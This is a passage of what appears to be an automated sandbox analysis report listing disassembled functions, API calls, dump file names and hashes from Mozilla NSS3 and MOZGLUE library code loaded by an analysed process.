                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1192971331-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(C_DigestInit), ref: 6C896C66
                                                                                                                                                                                                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C896C94
                                                                                                                                                                                                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C896CA3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97D930: PL_strncpyz.NSS3(?,?,?), ref: 6C97D963
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C896CB9
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C896CD5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                        • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                                                                                                                                                                                                                        • API String ID: 1003633598-3690128261
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C88AB7F,?,00000000,?), ref: 6C884CB4
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C88AB7F,?,00000000,?), ref: 6C884CC8
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,6C88AB7F,?,00000000,?), ref: 6C884CE0
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,6C88AB7F,?,00000000,?), ref: 6C884CF4
                                                                                                                                                                                                                                                                                        • PL_HashTableLookup.NSS3(?,?,?,6C88AB7F,?,00000000,?), ref: 6C884D03
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,00000000,?), ref: 6C884D10
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4
                                                                                                                                                                                                                                                                                        • PR_Now.NSS3(?,00000000,?), ref: 6C884D26
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DC6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DD1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929DED
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C884D98
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C884DDA
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C884E02
Memory Dump Source
• Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
• Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4032354334-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C754C2F
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CE7DC), ref: 6C754C82
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C754C89
                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
• Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                                                                                                        • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                        • API String ID: 2801635615-1351931279
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C8ACD08
                                                                                                                                                                                                                                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6C8ACE16
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C8AD079
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF
Memory Dump Source
• Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
• Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1351604052-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C798273), ref: 6C799D65
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(6C798273,?), ref: 6C799D7C
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6C799D92
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C799E0F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(6C79946B,?,?), ref: 6C799E24
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?), ref: 6C799E3A
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C799EC8
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(6C79946B,?,?,?), ref: 6C799EDF
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?), ref: 6C799EF5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 956590011-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b638d0a00c5cf8cbeb7dbac3baa6c4e024444677eaf7692f78d2674cb2b39943
                                                                                                                                                                                                                                                                                        • Instruction ID: 4831c9049824214f29a899658051dd5cbca701a83ccde165b93ba4914d54dda6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b638d0a00c5cf8cbeb7dbac3baa6c4e024444677eaf7692f78d2674cb2b39943
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52718D71909B418FD712CF19D68055AF3F8FFA9315B448629EC5E5BB12EB30E885CB81
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PORT_ZAlloc_Util.NSS3(00D5E52E), ref: 6C862C5D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0D30: calloc.MOZGLUE ref: 6C8C0D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0D30: TlsGetValue.KERNEL32 ref: 6C8C0D6D
                                                                                                                                                                                                                                                                                        • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C862C8D
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C862CE0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C862CDA,?,00000000), ref: 6C862E1E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C862E33
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: TlsGetValue.KERNEL32 ref: 6C862E4E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: EnterCriticalSection.KERNEL32(?), ref: 6C862E5E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: PL_HashTableLookup.NSS3(?), ref: 6C862E71
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: PL_HashTableRemove.NSS3(?), ref: 6C862E84
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C862E96
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862E00: PR_Unlock.NSS3 ref: 6C862EA9
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C862D23
                                                                                                                                                                                                                                                                                        • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C862D30
                                                                                                                                                                                                                                                                                        • CERT_MakeCANickname.NSS3(00000001), ref: 6C862D3F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C862D73
                                                                                                                                                                                                                                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6C862DB8
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C862DC8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C863EC2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C863ED6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C863EEE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: PR_CallOnce.NSS3(6C9C2AA4,6C8C12D0), ref: 6C863F02
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: PL_FreeArenaPool.NSS3 ref: 6C863F14
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C863E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C863F27
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3941837925-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6bb622882a99266be16a5a7222027c69d047fb67d3a4ff34560bb469587a96e5
                                                                                                                                                                                                                                                                                        • Instruction ID: f4b6479e4fc0eeec46dd67fa8f886e4c73a0f398dfe7f74936c54a4ea70466e7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bb622882a99266be16a5a7222027c69d047fb67d3a4ff34560bb469587a96e5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1512F71A042199BEB21CF2ACE88B5B77E5EF84349F140C7CEC4593A50EB35E814CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DDCF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77FA00: ReleaseSRWLockExclusive.KERNEL32(?,?,6C755407), ref: 6C77FA4B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7990E0: free.MOZGLUE(00000000,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C7990FF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7990E0: free.MOZGLUE(?,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C799108
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DE0D
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DE41
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DE5F
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DEA3
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DEE9
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C78DEFD), ref: 6C79DF32
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C79DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,00000000,?,?,?,6C79DF7F,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DB86
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C79DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,?,?,00000000,?,?,?,6C79DF7F,?,?,00000000,00000000), ref: 6C79DC0E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C78DEFD), ref: 6C79DF65
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DF80
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 112305417-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D32
                                                                                                                                                                                                                                                                                        • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D62
                                                                                                                                                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D6D
                                                                                                                                                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D84
                                                                                                                                                                                                                                                                                        • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5DA4
                                                                                                                                                                                                                                                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5DC9
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C7A5DDB
                                                                                                                                                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5E00
                                                                                                                                                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5E45
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2325513730-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C7431A7), ref: 6C77CDDD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74F100: LoadLibraryW.KERNEL32(shell32,?,6C7BD020), ref: 6C74F122
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C74F132
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000012), ref: 6C74ED50
                                                                                                                                                                                                                                                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C74EDAC
                                                                                                                                                                                                                                                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C74EDCC
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C74EE08
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C74EE27
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C74EE32
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C74EBB5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C77D7F3), ref: 6C74EBC3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C77D7F3), ref: 6C74EBD6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C74EDC1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                                                        • String ID: \Mozilla\Firefox\SkeletonUILock-
